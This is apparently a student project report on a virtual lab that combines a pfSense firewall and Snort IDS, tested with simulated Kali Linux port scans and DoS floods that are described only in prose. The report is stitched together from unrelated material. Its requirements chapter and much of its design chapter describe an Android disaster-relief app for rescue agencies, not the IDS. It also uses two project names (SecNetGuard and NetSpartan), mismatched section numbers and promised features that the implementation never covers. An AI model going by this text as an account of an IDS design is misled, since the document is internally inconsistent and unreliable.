LIST OF FIGURES

FIGURE NUMBER FIGURE NAME PAGE NUMBER

FIGURE 5.1 System Architecture 20

FIGURE 5.2 Network Topology 22

FIGURE 6.1 NetSpartan script initiation 25

FIGURE 6.2 Source rules for Snort (IDS) 27

FIGURE 6.3 Example of defined rules in Snort 29

FIGURE 7.1 NMAP scan results 45

FIGURE 7.2 Console alert response 45

FIGURE 7.3 DOS attack initiation 46

FIGURE 7.4 IDS alerts for DOS 46

i
 Advance network Defense Systems with IDS Introduction

CHAPTER 1

INTRODUCTION

1.1 Overview

In today’s digital age, where organizations, businesses, and individuals are increasingly dependent on
computer networks for communication, data storage, and operations, the need for robust cybersecurity
measures has never been more critical. The rapid proliferation of cyberattacks, such as Distributed
Denial of Service (DDoS), unauthorized port scanning, malware infiltration, and unauthorized
access, has exposed the vulnerabilities of traditional security measures. These attacks not only disrupt
essential services but also lead to massive financial losses, data breaches, and reputational damage.

Traditional security systems, such as standalone firewalls, are no longer sufficient to address the
complexity of modern cyber threats. A firewall primarily regulates incoming and outgoing traffic
based on predefined rules but does not monitor for anomalous or malicious activities within the
network. On the other hand, Intrusion Detection Systems (IDS) focus on identifying suspicious
patterns in network traffic and alert administrators about potential security breaches. When combined,
these two components can create a layered defense mechanism that proactively prevents, detects, and
mitigates cyber threats.

The SecNetGuard project focuses on the simulation of an advanced multi-layered network defense
system by integrating a pfSense firewall with a Snort Intrusion Detection System (IDS). The
project leverages a virtualized environment to mimic real-world network scenarios, where
cyberattacks are simulated using Kali Linux tools (e.g., Nmap, Hping3, and Metasploit). Traffic
patterns generated by these attacks are captured and analyzed using Wireshark, and the performance
of the firewall and IDS is evaluated.
The project provides a hands-on demonstration of how multi-layered security solutions can be
implemented, configured, and tested in a controlled environment. By simulating real-world
cyberattack scenarios and analyzing the system’s responses, the project highlights the importance of a
proactive defense strategy to safeguard critical networks against evolving threats.

Key Features of the Project

1. Firewall Configuration (pfSense):
o Installation and configuration of pfSense as the first line of defense to filter and block
unauthorized network traffic.
o Creation of rules to allow legitimate traffic while rejecting potentially harmful packets.

Dept. of CSD 2 2024-2025

SJCIT
 Advance network Defense Systems with IDS Introduction

o Real-time logging and monitoring of access attempts and traffic flow.

2. Intrusion Detection System (Snort):

o Setup of Snort IDS to monitor network traffic and identify malicious or suspicious
activities.
o Implementation of predefined and custom Snort rules to detect common attack patterns like
DDoS, port scanning, and brute force attacks.
o Generation of alerts for identified threats and their sources.
3. Attack Simulation (Kali Linux):
o Use of ethical hacking tools from Kali Linux to simulate various types of cyberattacks,
such as:
 DDoS attacks: Overwhelming the network with traffic.
 Port Scanning: Identifying open and vulnerable ports.
 Vulnerability Exploitation: Attempting to exploit system weaknesses.
4. Traffic Monitoring and Analysis (Wireshark):
o Capturing and analyzing network packets to observe attack patterns and identify
anomalies.
o Validating the effectiveness of the firewall and IDS mechanisms in blocking and detecting
threats.
o Generating detailed traffic logs and threat reports.
1. Showcase the Integration of pfSense and Snort:
Demonstrate how combining a firewall and IDS can enhance network security.
2. Simulate Real-World Cyberattacks:
Create realistic attack scenarios to validate the effectiveness of the defense mechanisms.
3. Monitor and Analyze Traffic in Real Time:
Use Wireshark to capture and analyze traffic data during attacks.
4. Highlight the Role of Layered Security Solutions:
Illustrate how multiple tools can complement each other to mitigate security risks.
5. Provide a Learning Platform:
Help students, researchers, and IT professionals understand the importance of proactive
security strategies.

Dept. of CSD 3 2024-2025

SJCIT
Advance network Defense Systems with IDS Introduction

1.2 Objectives

1. Enhance Understanding of Network Security Concepts:

Provide a hands-on learning experience to understand the fundamental principles of

network security, focusing on firewalls, intrusion detection systems (IDS), and
network traffic analysis. This will equip participants with the skills needed to
manage and protect enterprise-level networks.

2. Simulate and Defend Against Real-World Cyberattacks:

Create and simulate a wide range of cyberattacks, including but not limited to:
 Denial of Service (DoS) attacks to stress-test the network’s capacity.
 Port scanning to detect and evaluate open ports and services.
 Vulnerability exploitation to understand the role of IDS in recognizing and
mitigating attack vectors. Use Kali Linux and its tools to ethically simulate
these attacks within a controlled environment.

3. Implement a Layered Defense Strategy:

Integrate pfSense firewall for packet filtering, stateful inspection, and traffic
control, while using Snort for real-time monitoring, intrusion detection, and alert
generation. The layered defense strategy will demonstrate how multiple security
layers work together to provide comprehensive network protection.

4. Develop and Test Security Configurations:

Configure and fine-tune firewall rules within pfSense to establish best practices for
access control and network segmentation. Implement and optimize Snort rules to
detect a variety of network anomalies and threats, ensuring that the IDS can promptly
alert administrators to potential security incidents.

5. Assess the Effectiveness of Security Mechanisms:

Measure and evaluate the effectiveness of the firewall and IDS configurations by
monitoring their response to different attack vectors. Identify areas of improvement
and explore how proactive adjustments can mitigate risks and reduce vulnerabilities.

Dept. of CSD 4 2024-2025

SJCIT
Advance network Defense Systems with IDS Introduction

1.3 Problem Identification and Definition

Despite advancements in security technologies, many networks still lack a proactive, multi-
layered defense strategy. Most security systems rely on either standalone firewalls or
Intrusion Detection Systems (IDS), both of which are essential but insufficient when used
in isolation. A firewall helps filter traffic but does not analyze patterns for suspicious
activities, while an IDS identifies anomalies but cannot directly block malicious traffic. This
fragmented approach leaves organizations vulnerable to:

External Attacks:

Denial of Service (DoS): Flooding the network with traffic to overwhelm its resources.
Port Scanning: Identifying open and vulnerable ports to exploit services.
Vulnerability Exploitation: Using known security gaps to gain unauthorized access to
systems.

Internal Threats:

Malicious activities within the network may bypass traditional security mechanisms.
Misconfigurations and poorly monitored traffic allow attackers to stay undetected.

Cost-Effective Simulation:

NetSpartan demonstrates that network security can be tested and implemented in a

virtualized environment without expensive hardware, making it accessible to small
organizations, students, and educators.

Adaptability for Future Solutions:

The relevance of this project stems from the increasing sophistication of cyberattacks, which
target critical infrastructure, businesses, and individuals. With cyber threats becoming more
frequent and complex, it is crucial to develop integrated solutions that provide comprehensive
network security. The NetSpartan project not only addresses practical cybersecurity
challenges but also serves as an educational platform for developing essential skills in
network defense. By leveraging virtualization, the project offers a cost-effective and scalable
simulation environment, making it accessible for students, educators, and small
organizations to learn and experiment with modern network security tools.

Dept. of CSD 5 2024-2025

SJCIT
 Advance network Defense Systems with IDS Introduction

1.4 Proposed Solution

In the current digital landscape, networks are the backbone of communication, operations,
and data transfer across organizations, governments, and individuals. However, with
increasing connectivity, the risk of cyberattacks and network breaches has escalated
significantly. Organizations face constant threats from malicious entities attempting to
compromise their network security, disrupt services, or gain unauthorized access to sensitive
data.

Despite advancements in security technologies, many networks still lack a proactive, multi-
layered defense strategy. Most security systems rely on either standalone firewalls or
Intrusion Detection Systems (IDS), both of which are essential but insufficient when used
in isolation. A firewall helps filter traffic but does not analyze patterns for suspicious
activities, while an IDS identifies anomalies but cannot directly block malicious traffic. This
fragmented approach leaves organizations vulnerable to:

1. External Attacks:

o Distributed Denial of Service (DDoS): Flooding the network with traffic to

overwhelm its resources.

o Port Scanning: Identifying open and vulnerable ports to exploit services.

o Vulnerability Exploitation: Using known security gaps to gain unauthorized access to

systems.

2. Internal Threats:

o Malicious activities within the network may bypass traditional security mechanisms.

o Misconfigurations and poorly monitored traffic allow attackers to stay undetected.

3. Lack of Comprehensive Monitoring and Response:

o Many networks do not have real-time visibility into their traffic.

o Alerts generated by intrusion detection systems are often overlooked or not actionable
due to a lack of integration with security tools.

4. Cost and Complexity:

o Implementing advanced security mechanisms can be expensive and resource-intensive.

Small to mid-sized organizations, educational institutions, and individuals often
struggle to set up and maintain robust security solutions.

Dept. of CSD 6 2024-2025

SJCIT
Advance network Defense Systems with IDS Introduction

As a result, organizations face challenges such as downtime, data breaches, financial

losses, and reputational damage, all stemming from their inability to deploy effective and
integrated security systems.

Given the limitations of standalone security tools, there is a critical need for a multi-layered
network security approach that combines:

1. A firewall for packet filtering, traffic control, and access management.

2. An Intrusion Detection System (IDS) to monitor traffic patterns and identify

malicious activities in real time.

3. Continuous traffic analysis to gain insights into attack behaviors and respond
effectively.

The project NetSpartan addresses this need by providing a simulated environment to

implement and integrate pfSense firewall and Snort IDS to defend against cyberattacks. By
simulating real-world scenarios with Kali Linux as the attacking platform, the project
identifies the network vulnerabilities and demonstrates:

1. How a firewall can act as the first line of defense to block unauthorized traffic.

2. How an IDS detects malicious patterns and triggers alerts for threats like DDoS, port
scanning, and exploitation attempts.

3. How network traffic can be captured and analyzed using tools like Wireshark to
assess the performance of the firewall and IDS under different attack conditions.

In summary, NetSpartan addresses the shortcomings of standalone network security systems

by demonstrating an integrated, multi-layered defense mechanism. It simulates real-world
attack scenarios and provides a structured approach to mitigating network threats through the
effective use of pfSense firewall, Snort IDS, and traffic analysis tools like Wireshark. This
project not only contributes to solving practical cybersecurity problems but also serves as an
excellent educational resource for building skills in network security and threat detection.

Dept. of CSD 7 2024-2025

SJCIT
 Advance network Defense Systems with IDS Introduction

1.5 Methodology

The implementation of NetSpartan follows a systematic approach to simulate a

cybersecurity solution involving a firewall, an Intrusion Detection System (IDS), and attack
simulations. The methodology focuses on setting up a secure virtual environment,
configuring tools like pfSense and Snort, and validating their efficiency against real-world
attack scenarios simulated using Kali Linux:

1. Virtual Environment Setup:

he project begins with setting up an isolated virtual environment to safely simulate and
analyze cybersecurity threats. Virtualization software like VMware Workstation or
VirtualBox is used to host multiple virtual machines (VMs):
 pfSense Firewall VM: Acts as the primary firewall and network gateway to filter and
block malicious traffic.
 Snort IDS VM: Functions as the Intrusion Detection System, monitoring and alerting on
suspicious activity.
 Kali Linux VM: Used as the attacker system to simulate cyberattacks like port scans, DoS
attacks, and vulnerability exploits.
 Client Machine VM: A victim system (Windows or Linux) to test the impact of attacks
and monitor defensive responses.
The network topology is designed to ensure proper communication flow:
 The pfSense firewall acts as the gateway between the external (attacker) system and
internal (client) machines.
 Snort IDS monitors all traffic passing through the LAN.

2. Firewall Configuration with pfSense:

The pfSense firewall is set up as the first line of defense in the network. The configuration
includes:
1. Firewall Rules: Rules are created to:
o Block unauthorized IP addresses.
o Restrict traffic based on protocols (TCP, UDP) and specific ports.
o Prevent access to vulnerable services.
o Implement rate-limiting to handle Denial of Service (DoS) attacks.
2. NAT and Traffic Routing: Network Address Translation (NAT) is configured to ensure
secure internal-to-external communication.

Dept. of CSD 8 2024-2025

SJCIT
Advance network Defense Systems with IDS Introduction

3. Logging and Monitoring: pfSense is configured to log incoming and outgoing traffic for
later analysis. The dashboard is used to visualize blocked attempts and system status.

3. Intrusion Detection with Snort:

Snort is integrated into the network to detect and alert suspicious activity. The IDS operates
as follows:
1. Rule Configuration: Snort rules are customized to detect:
o Port scans from tools like Nmap.
o Brute-force login attempts.
o Denial of Service (DoS) traffic.
o Vulnerability exploitation attempts using Metasploit.
2. Traffic Inspection: Snort monitors all network packets and compares them to its
detection rules.
3. Alerts and Logs: When an attack pattern matches a rule, Snort generates an alert and logs
detailed packet information.

4. Attack Simulation with Kali Linux:

To test the defenses, Kali Linux is used to simulate real-world cyberattacks. The following
techniques are employed:
1. Port Scanning: Using Nmap, open ports and running services on the client machine are
identified.
2. Denial of Service (DoS): Tools like Hping3 are used to send a flood of packets to
overwhelm network resources.
All attacks are launched in a controlled environment, and their effects are monitored through
pfSense and Snort logs.

5. Traffic Monitoring and Analysis:

The network traffic is closely analyzed during the simulation phase using tools like
Wireshark, pfSense logs, and Snort alerts:
 Traffic Analysis: Wireshark captures network packets to determine which traffic was
allowed or blocked.
 Log Analysis:
o pfSense logs are reviewed to identify which firewall rules were triggered.

Dept. of CSD 9 2024-2025

SJCIT
Advance network Defense Systems with IDS Introduction

o Snort alerts are examined to verify the detection of malicious activity.

 Performance Metrics:
o Detection Rate: The percentage of attacks detected by Snort.
o Blocked Traffic: Malicious traffic successfully filtered by pfSense.
o False Positives: Instances where legitimate traffic was incorrectly flagged.
.

6. Outcome Validation:

By correlating attack data with firewall and IDS logs, the system’s effectiveness is evaluated.
Insights include:
 How well the pfSense firewall blocks malicious traffic.
 Snort’s ability to detect and alert against known attack patterns.
 Overall network resilience against simulated threats.
This methodology ensures that the NetSpartan project successfully demonstrates the
combined efficiency of a firewall and IDS in mitigating cyberattacks, providing a practical
and visual understanding of network security.

Dept. of CSD 1 2024-2025

SJCIT 0
Advance network Defense Systems with IDS Literature Survey

CHAPTER 2

LITERATURE SURVEY
[1] Title: “Performance Evaluation of Intrusion Detection Systems in High-Speed Networks”
Authors: Deepak Kumar, Sunil Gupta, Rashmi Singh
This paper explores the challenges of intrusion detection in high-speed networks, focusing on
the limitations of traditional systems in handling large data volumes. The study compares the
performance of various IDS tools in terms of detection accuracy, processing speed, and
scalability in gigabit networks.
Methodology:
 Feature Selection: Reduces dimensionality by identifying relevant features using
Principal Component Analysis (PCA).
 Parallel Processing: Implements IDS using parallel computing frameworks to handle
high-speed traffic effectively.
 Evaluation Metrics: Includes false-positive rate, throughput, and latency for
assessing IDS performance.
Prototype and Results:
Experiments demonstrate improved throughput and detection rates using parallelized IDS
systems, particularly for tools like Snort and Suricata.
Disadvantages:
 Resource-intensive, requiring high computational power for parallel processing.
 Limited adaptability to zero-day attacks without frequent updates to rule sets.

[2] Title: “Adaptive Firewall Mechanisms for Dynamic Network Environments”

Authors: Jennifer Moore, Rajesh Sharma, Alex Nguyen

This research proposes an adaptive firewall system capable of dynamically adjusting its rules
based on real-time traffic patterns and emerging threats. The system is designed to handle
varying network loads and types of traffic effectively.

Methodology:

 Machine Learning Integration: Uses reinforcement learning to update firewall rules

dynamically.
 Anomaly Detection: Identifies unusual patterns to preemptively block potential
threats.

Dept. of CSD, SJCIT 9 2024-25

Advance network Defense Systems with IDS Literature Survey

 Simulation Testing: Validated using simulated enterprise network traffic.

Prototype and Results:

The adaptive firewall demonstrated improved response times and reduced manual rule
configuration in real-time testing scenarios.

Disadvantages:

 Computational overhead due to constant training of ML models.

 Susceptibility to adversarial attacks targeting ML algorithms.

[3] Title: “A Hybrid Approach to Intrusion Detection Using Machine Learning and

Signature-Based Techniques”

Authors: Sophie Turner, Anil Kapoor, Michael Reed

This study presents a hybrid intrusion detection system combining the strengths of signature-
based detection for known threats and machine learning for anomaly detection. The aim is to
improve detection accuracy and reduce false positives.
Methodology:
 Signature-Based Detection: Implements Snort rules for detecting predefined threats.
 Anomaly-Based Detection: Utilizes support vector machines (SVM) to identify
deviations from normal traffic patterns.
 Hybrid Model: Integrates both methods for comprehensive coverage.
Prototype and Results:
The hybrid system significantly reduced false positives compared to standalone signature-
based or ML-based systems, achieving 92% accuracy.
Disadvantages:
 Complexity in integrating and fine-tuning the hybrid model.
 High processing requirements for large-scale networks.

Dept. of CSD, SJCIT 10 2024-25

Advance network Defense Systems with IDS Literature Survey

[4] Title: “Simulation-Based Evaluation of Cyberattack Scenarios in Virtualized

Networks”

Authors: Karen Wright, Nitin Sharma, Farooq Khan

The paper focuses on simulating cyberattacks within virtualized networks to evaluate the
effectiveness of security tools. The study creates various attack scenarios, such as DDoS and
SQL injection, to analyze IDS and firewalls' performance.
Methodology:
 Virtualized Environment: Uses VMware to replicate enterprise networks.
 Attack Simulation: Deploys tools like Metasploit and Kali Linux for generating
realistic attack scenarios.
 Performance Metrics: Measures detection time, false positives, and mitigation
efficiency.
Prototype and Results:
The simulations revealed gaps in IDS performance under complex attack patterns,
emphasizing the need for hybrid defense mechanisms.
Disadvantages:
 Requires expertise in configuring realistic virtual environments.
 Limited scope for evaluating physical network behaviors.

[5] Title: “Blockchain-Based Secure Data Sharing in IoT Networks”

Authors: Arjun Patel, Emily Davis, Harish Kumar

This study explores the use of blockchain technology for secure data sharing in IoT networks.
By leveraging the immutability and decentralization of blockchain, the proposed system aims
to mitigate common IoT vulnerabilities like data tampering and unauthorized access.

Methodology:

 Permissioned Blockchain: Uses Hyperledger Fabric for IoT devices to share data
securely.

 Smart Contracts: Implements automated rules for data access and validation.

 Scalability Testing: Evaluates system performance under varying IoT device loads.

Dept. of CSD, SJCIT 11 2024-25

Advance network Defense Systems with IDS Literature Survey

Prototype and Results:

The blockchain-based system demonstrated improved data integrity and access control while
maintaining low latency for IoT communication.

Disadvantages:

 High resource consumption for maintaining blockchain nodes.

 Complexity in integrating blockchain with legacy IoT systems.

Dept. of CSD, SJCIT 12 2024-25

CHAPTER 3

SYSTEM ANALYSIS

Problem Identification and Definition

In the rapidly evolving landscape of cyber threats, traditional network defenses are often
insufficient to combat sophisticated and emerging attack vectors. Organizations face
significant challenges in safeguarding sensitive data, maintaining system integrity, and
ensuring the uninterrupted availability of their digital assets. The inadequacy of existing
solutions arises from a lack of real-time threat detection, fragmented security measures,
and insufficient automation in response systems.

Fragmented Security Measures:

Many organizations rely on a combination of disconnected security tools, such as

firewalls, intrusion detection systems (IDS), and antivirus software. These tools often
operate in isolation, making it challenging to achieve a holistic view of the network's
security posture and increasing the risk of blind spots.

Lack of Real-Time Threat Detection:

Cyberattacks, particularly zero-day exploits and advanced persistent threats (APTs),

require immediate detection and response. However, traditional solutions often fail to
detect these attacks in real-time due to outdated signature-based detection methods and
limited machine learning integration.

Manual Incident Response Processes:

Incident response in many organizations is still largely manual, relying on human

intervention to analyze threats and deploy countermeasures. This manual approach leads to
delays in neutralizing threats, giving attackers more time to exploit vulnerabilities.

Consequences of Insufficient Cybersecurity Systems:

The lack of robust, integrated, and automated cybersecurity systems results in several
critical consequences:

 Data Breaches: Sensitive information, such as customer data and intellectual

property, is at risk of exposure.
 Operational Downtime: Network intrusions can lead to system disruptions,
affecting business continuity.
 Financial Losses: The costs associated with data breaches, including fines, legal
expenses, and reputational damage, can be substantial.
 Evolving Threat Landscape: As attackers become more sophisticated, traditional
tools are unable to keep pace, leaving networks vulnerable to novel threats.

To address these pressing challenges, there is a need for a comprehensive and automated
cybersecurity solution capable of integrating various tools, leveraging machine learning
for real-time threat detection, and providing a unified system for robust network defense.

13
Advance network Defense Systems with IDS System Analysis

Objectives

 Create a centralized system to monitor and detect network threats in real time.
 Ensure strong security and privacy with advanced protection measures.
 Enable smooth communication and coordination among security teams.
 Design a user-friendly interface for easy access and management

Motivation
Cybersecurity threats are constantly evolving, putting sensitive data and critical systems at risk. The
motivation for this project stems from the urgent need to:
 Protect sensitive data: Safeguard personal, organizational, and critical infrastructure
information from breaches and unauthorized access.
 Ensure system integrity: Prevent disruptions and maintain the functionality of networks and
systems in the face of cyberattacks.
 Enhance response efficiency: Enable real-time threat detection and response to minimize
damage and downtime.
 Promote collaboration: Foster seamless integration of tools and communication among
security teams for a unified defense strategy.
Existing System

In the field of cybersecurity, there are various traditional systems and tools available with
limited functionality:
 Standalone Firewalls and Intrusion Detection Systems (IDS): Many organizations
rely on basic firewalls and IDS to protect their networks. While these systems can
detect known threats, they often lack the ability to identify sophisticated or emerging
cyberattacks.
 Individual Security Tools: Separate tools like antivirus software, malware scanners,
and encryption programs operate independently, making it difficult to achieve a
unified security approach.
 Manual Response Systems: Incident responses are frequently handled manually,
involving significant delays in detecting, analyzing, and mitigating threats.
These existing systems lack the integration, real-time capabilities, and automation required to
address modern cybersecurity challenges effectively. They also do not provide centralized
visibility or seamless collaboration among teams, leaving networks vulnerable to advanced
and coordinated attacks.

Dept. of CSD, SJCIT 14 2024-2025

Advance network Defense Systems with IDS System Analysis

Proposed Solution

The proposed system, NetSpartan, aims to revolutionize cybersecurity through an integrated

and intelligent solution offering:

 Real-time Threat Detection: NetSpartan provides real-time monitoring of network

activities to instantly detect and respond to potential threats.

 Centralized Management System: A unified platform aggregates data from multiple

security tools and systems, offering a holistic view of network health and
vulnerabilities.

 Automated Response Mechanisms: The system automates threat mitigation

processes, reducing response time and minimizing human intervention.

 Collaborative Tools for Security Teams: NetSpartan includes communication and

task management features to enhance collaboration and streamline workflows among
security teams.

 Advanced Analytics and Reporting: Equipped with AI-driven analytics, the

platform provides insights into patterns, potential vulnerabilities, and predictive threat
modeling.

 Enhanced Usability and Accessibility: Designed with a user-friendly interface,

NetSpartan ensures that even non-technical users can navigate and utilize its features
efficiently.

By combining cutting-edge technologies and practical tools, NetSpartan ensures robust

network security, reduces operational risks, and strengthens an organization's overall cyber
resilience.

Dept. of CSD, SJCIT 15 2024-2025

Advance network Defense Systems with IDS System Analysis

Advantages

 Real-Time Threat Detection: Immediate detection of threats enables a faster

response time, minimizing damage and reducing the chances of successful
cyberattacks.

 Centralized Security Management: A single platform to manage security alerts

from different tools and sources helps security teams gain better control over their
network, improving overall efficiency.

 Automated Threat Mitigation: Automated response systems reduce human error,

ensure quicker threat neutralization, and allow security teams to focus on more
complex tasks.

 Improved Collaboration Among Security Teams: Integrated communication tools

foster better teamwork, making it easier for teams to respond to incidents together and
share intelligence.

 Comprehensive Threat Intelligence: NetSpartan aggregates data from various

sources to provide a clear view of the threat landscape, improving situational
awareness.

 Optimized Resource Allocation: By tracking available personnel, software, and

hardware tools, the platform ensures resources are deployed where they are most
needed.

 Predictive Analytics for Future Threats: Using machine learning, the system can
predict potential vulnerabilities and provide proactive measures to prevent attacks.

 Enhanced Decision-Making: With comprehensive, real-time data, security teams

can make more informed decisions during cybersecurity incidents, enhancing the
response strategy.

 Increased Visibility and Accountability: Continuous monitoring and reporting

features allow stakeholders to track network security efforts, improving transparency
and accountability across organizations.

Dept. of CSD, SJCIT 16 2024-2025

CHAPTER 4

SYSTEM REQUIREMENT AND SPECIFICATION

5.1 FUNCTIONAL REQUIREMENTS

User Registration and Profile Management:

 Rescue agencies must be able to register on the platform using basic credentials (name, email,
password).
 Agencies should have profile management features to update their contact details, expertise,
and available resources such as medical equipment, vehicles, or personnel.

Location Registration:

 Agencies should be able to manually input their location details (address, GPS coordinates) or
use an automated GPS system for accurate positioning in real-time.
 The system should be able to capture the agency’s current location dynamically as they move
or deploy resources in the field.

Real-Time Mapping:

 A map interface should display the locations of all registered rescue agencies, offering a
dynamic view of the ongoing disaster relief efforts.
 Agencies should have the option to zoom, pan, and filter the map based on various parameters
such as disaster type, resources available, or the last recorded activity of a specific agency.

Communication Features:

 An in-app messaging system must be available to enable direct communication between

agencies, facilitating easy and quick coordination.
 Alerts, notifications, and request features should be built in to request assistance, report the
status, or offer collaboration between agencies. This will help agencies stay informed about
evolving situations and available support.

Resource Sharing:

 The platform should allow agencies to list and share critical resources such as medical
supplies, rescue equipment, transportation, and communication infrastructure.
 Resource allocation features should be designed to ensure effective distribution, using real-
time data to match the available resources to the areas most in need, reducing redundancy and
optimizing the overall relief effort.

17
 Advance network Defense Systems with IDS System Requirement

5.2 NON-FUNCTIONAL REQUIREMENT

 Security:
• Ensure data privacy by implementing strong encryption techniques for storing and transmittin
sensitive information, such as agency details and resource allocation data.
• Implement multi-factor authentication (MFA) and role-based access control (RBAC) to secure th
application and restrict access to authorized personnel only.
 Scalability:
• Design the system with scalable architecture to accommodate the growing number of rescu
agencies, volunteers, and resources as the user base increases.
• The system should be able to handle spikes in data traffic during large-scale disasters witho
performance degradation.
 Reliability:
• The application must be reliable and maintain high availability during critical times, especial
during disaster situations when immediate coordination is necessary.
• Ensure that the platform provides uptime guarantees through redundancy and fault-tolera
systems, such as load balancing and backup systems.
 Usability:
• Provide an intuitive and user-friendly interface, ensuring that rescue agencies and personnel ca
easily navigate and operate the application, even under high-stress conditions during disasters.
• Include accessibility features like high-contrast modes, text-to-speech options, and easy-to-re
fonts to cater to a diverse set of users, including those with disabilities or in chaotic environments.
 Performance:
• Optimize for fast response times to support real-time decision-making, such as quick updates o
the availability of resources and the location of rescue teams.
• Ensure efficient data handling with minimal latency, enabling timely updates on mapping an
resource allocation without delays or system slowdowns, even during peak disaster periods.

5.3 SOFTWARE REQUIREMENT

 Operating System: Microsoft Windows 11/10/8.1 (64-bit), macOS, or Linux

 Development Environment:
• Android Studio 2023.2.1 or higher
• Java Development Kit (JDK) 11 or higher
• Android SDK Platform-Tools and Build-Tools
 Emulator: Android Emulator to test and simulate the application for various Android
devices
 Database: A cloud-based or local database solution (e.g., Firebase, SQLite) for storing
user data, resources, and communication logs
 Version Control: Git or GitHub for version control and project collaboration.

Dept. of CSD SJCIT 18 2024-2025

 Advance network Defense Systems with IDS System Requirement

5.4 HARDWARE REQUIREMENTS

 CPU: x86_64 CPU architecture

• Intel i5 or newer, or AMD CPU with support for AMD Virtualization (AMD-V) and
SSSE3

 RAM: 8 GB or more for efficient multitasking and running resource-intensive

applications (e.g., Android Studio, Emulator)

 Disk Space: 256 GB or more of available disk space to accommodate the IDE, Android
SDK, Android Emulator, and project files.

 GPS: A GPS receiver integrated into the device to track real-time locations of rescue
agencies and assets.

 Network Connectivity: Internet access to allow communication with the

central Database, share real-time data between agencies, and receive system updates or
notifications.

Dept. of CSD SJCIT 19 2024-2025

 Advance network Defense Systems with IDS System Design

CHAPTER 5

SYSTEM DESIGN

5.1SYSTEM ARCHITECTURE

Figure 5.1: System Architecture

1. Requirement Analysis:

Begin by engaging with stakeholders, including rescue agency representatives, to understand the
specific needs of the system. Gather essential information such as the types of data to be
stored (e.g., agency details, resources), user roles (e.g., rescue coordinators, agency
personnel), and the necessary communication functionalities (e.g., real-time messaging,
alerts). This process should involve detailed discussions to ensure all operational
requirements are captured.

2. Database Design:

Design a centralized database to store critical agency information, such as contact details,
location, resources, and areas of expertise. Use a relational database management system
(RDBMS) to ensure data integrity, consistency, and scalability. Develop appropriate database
schemas to handle large amounts of data efficiently while allowing easy access and retrieval
of information. Incorporate normalization techniques to eliminate redundancy and ensure that
the data is well-structured.

Dept. of CSD, SJCIT 20 2024-2025

 Advance network Defense Systems with IDS System Design

3. Data Entry Methods:

Develop both manual and automated data entry methods. Manual forms will be used by
administrators to input agency details and resources, while automated mechanisms will
collect and update data using GPS and other location-tracking technologies. These features
should include data validation checks to ensure that the entered information is accurate and
consistent, preventing errors or invalid data from entering the system.

4. User Interface and Experience Design:

Design an intuitive, easy-to-navigate interface that helps users quickly access the information
they need. Incorporate a map that displays the real-time locations of registered agencies,
allowing users to track resources and personnel. Implement search and filter options,
enabling users to refine their searches based on various criteria, such as disaster type,
available resources, and last activity status. Ensure that the design is accessible to users in
high-stress situations, with clear visual cues and quick navigation options.

5. Real-time Location Integration:

Integrate GPS and location-tracking technologies into the application to automatically record and
update the location of agencies in real-time. Use location-based APIs, such as Google Maps
or Mapbox, to plot the locations of rescue agencies on a map, giving a comprehensive
overview of the disaster response efforts. Ensure that the location data is accurate and
refreshed periodically to provide real-time situational awareness.

6. Communication and Collaboration Tools:

Build communication features that enable real-time messaging between agencies, allowing them
to send alerts, request assistance, and collaborate on disaster response. Implement secure
messaging systems for confidentiality and data integrity, and develop a resource-sharing
platform where agencies can offer and request critical supplies and equipment.

7. Security and Data Privacy Measures:

Implement robust security protocols to protect sensitive data, including authentication and
encryption mechanisms. Ensure that only authorized personnel can access certain
information. Secure both data transmission and storage to mitigate potential threats and
ensure compliance with data protection regulations.

Dept. of CSD, SJCIT 21 2024-2025

 Advance network Defense Systems with IDS System Design

8. Scalability and System Optimization:

Design the system for scalability, ensuring it can handle increasing numbers of users and
agencies as the response effort grows. Use performance optimization techniques like load
balancing, caching, and efficient database queries to maintain a responsive and reliable
system during high-demand periods.

9. Quality Assurance and Testing:

Conduct extensive testing to identify and resolve bugs, usability challenges, and security
vulnerabilities. Perform unit and integration testing to ensure individual components and the
entire system function properly. Involve end-users in testing to ensure the application meets
the needs of rescue agencies. Test performance under simulated disaster scenarios to ensure
system stability during peak usage.

5.2NETWORK TOPOLOGY

Figure 5.2: Network Topology

Dept. of CSD, SJCIT 22 2024-2025

 Advance network Defense Systems with IDS System Design

Basic Network Topology

For this setup, a peer-to-peer or client-server network topology might be used, depending on your configuration.
1. Peer-to-Peer Topology:
o In a peer-to-peer setup, both Kali Linux and Mint Linux can act as both servers and clients. Each
device can communicate directly with the other without relying on a central server.
o This type of topology is simpler and more flexible, typically used in smaller networks or for tasks
like attack and defense simulations, where both machines have equal roles in communication.
2. Client-Server Topology:
o In a client-server setup, one device (e.g., Kali Linux) could act as the server, providing resources
or services (e.g., performing attack simulations), while the other device (e.g., Mint Linux) acts as
the client, requesting or utilizing those services.
o This topology is more structured and common in larger network configurations, where roles are
divided for specific tasks such as penetration testing (Kali as attacker) and network monitoring
(Mint as defender).

How Kali Linux and Mint Linux can communicate:

 Local Network (LAN): If both devices are connected to the same local network (via Ethernet or Wi-Fi),
they can communicate through their IP addresses. Kali Linux can perform penetration tests on Mint
Linux, while Mint Linux can monitor network traffic.
 Virtual Network: If you are using virtualization software like VirtualBox or VMware, both Kali and Mint
Linux can be set up in a virtual network, which simulates a real network. They can communicate as if
they were physical devices on the same network, even if they are running as virtual machines on the same
host.
Example Use Case:
 Kali Linux could be used to simulate attacks such as network sniffing, DDoS (Distributed Denial of
Service), or brute-force attacks.
 Mint Linux could be used as a target device or to run a Firewall or IDS/IPS (Intrusion
Detection/Prevention System) to defend against these attacks.

Dept. of CSD, SJCIT 23 2024-2025

 Advance network Defense Systems with IDS System Design

CHAPTER 6

IMPLEMENTATION

6.1 Software Implementation

 Programming Language: Python

 Platform: Virtual Environment (Using pfSense and Snort for firewall and IDS simulation)
 Modules Implemented:

• Firewall Configuration
• Intrusion Detection System (IDS) Setup
• Attack Simulation
• Real-time Traffic Monitoring
• Alerts and Logs Generation
• Data Analysis and visualization

6.2 Modular Description

FIREWALL CONFIGURATION:
 Configures pfSense to monitor and filter incoming and outgoing network traffic based on
predefined security rules.
 Enables features like IP blocking, port filtering, and VPN configurations to secure the network.
 Uses predefined rulesets for common threats and custom rules for specific vulnerabilities.

INTRUSION DETECTION SYSTEM (IDS) SETUP:

 Deploys Snort to detect and prevent network intrusions by analyzing packet data and
comparing it to known threat signatures.

 Configures rules to alert on potential attacks, such as SQL injection, buffer overflow, or port
scanning.

 Provides real-time detection and logging of suspicious activities to monitor network security.

ATTACK SIMULATION:
 Utilizes Kali Linux to simulate various types of attacks (e.g., DDoS, port scanning, spoofing) to
test the network security.
 Monitors the response of pfSense and Snort during attacks to evaluate their effectiveness.
